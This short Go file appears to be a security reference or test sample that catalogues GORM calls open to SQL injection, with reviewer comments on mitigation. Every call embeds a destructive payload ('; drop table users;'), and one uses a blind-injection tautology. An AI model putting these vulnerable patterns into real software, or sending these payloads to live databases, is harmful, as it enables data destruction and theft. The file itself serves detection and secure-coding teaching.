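// Injectable GORM call patterns. Every call below builds its statement from a
// raw SQL string; the inline "; drop table users;" payloads stand in for an
// attacker-controlled value (request parameter, header, untrusted config).
// With a trusted literal these calls are harmless; with untrusted input the
// text after the ';' runs as a second statement.
//
// Mitigation (reviewer note): pass values through '?' placeholders with
// separate args for Raw/Exec/Where/Not/Or/Find/First/Delete, and allow-list
// identifiers or fragments for the APIs that accept SQL text rather than
// values (Order, Table, Joins, InnerJoins, gorm.Expr) — placeholders do not
// apply to those.

// Raw SQL strings passed straight through.
db.Raw("select name from users; drop table users;").First(&user)
db.Exec("select name from users; drop table users;")

// Order/Table/Joins/InnerJoins take SQL fragments, not bound values, so the
// only defence is validating the fragment against a fixed allowlist.
db.Order("name; drop table users;").First(&user)
db.Table("users; drop table users;").Find(&users)
db.Delete(&User{}, "id=1; drop table users;")
db.Joins("inner join orders; drop table users;").Find(&users)
db.InnerJoins("inner join orders; drop table users;").Find(&users)

// Despite being parameterized in Exec(), gorm.Expr is still injectable:
// gorm.Expr exists to embed raw SQL, so its text is spliced into the
// statement rather than bound, and the '?' placeholder gives no protection
// when the Expr text is untrusted. Never build gorm.Expr from user input.
db.Exec("UPDATE users SET name = '?' WHERE id = 1", gorm.Expr("alice'; drop table users;-- "))

// Inline string conditions on Not/Or/Find are appended verbatim to the WHERE
// clause.
db.Where("id=1").Not("name = 'alice'; drop table users;").Find(&users)
db.Where("id=1").Or("name = 'alice'; drop table users;").Find(&users)
db.Find(&User{}, "name = 'alice'; drop table users;")

// The following functions can only be injected by blind SQL injection
// methods: the inline condition still rewrites the WHERE clause, but
// (presumably because only the first matching row is returned, not the query
// text) extraction has to be inferential — boolean- or time-based.
db.First(&users, "2 or 1=1-- ")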